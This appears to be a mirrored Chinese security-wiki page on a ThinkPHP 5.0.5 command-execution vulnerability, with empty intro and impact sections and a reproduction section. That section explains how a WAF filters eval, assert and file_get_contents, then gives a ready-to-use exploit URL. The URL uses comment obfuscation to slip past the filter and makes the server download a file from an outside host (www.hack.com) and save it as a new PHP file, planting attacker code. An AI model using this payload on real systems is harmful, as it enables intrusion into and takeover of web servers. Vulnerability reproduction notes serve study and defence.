menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 002-Thinkphp 5.x 命令执行漏洞 chevron_right 002-Thinkphp 5.0.5.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-Thinkphp 5.0.5.md
    520 B / 2021-07-17 00:01:32
        # Thinkphp 5.0.5
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    ### 三、复现过程
    
    waf对eval进行了拦截
    
    禁止了assert函数对eval函数后面的括号进行了正则过滤
    
    对file_get_contents函数后面的括号进行了正则过滤
    
    
    ```
    http://url/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>
    ```
    
    links
    file_download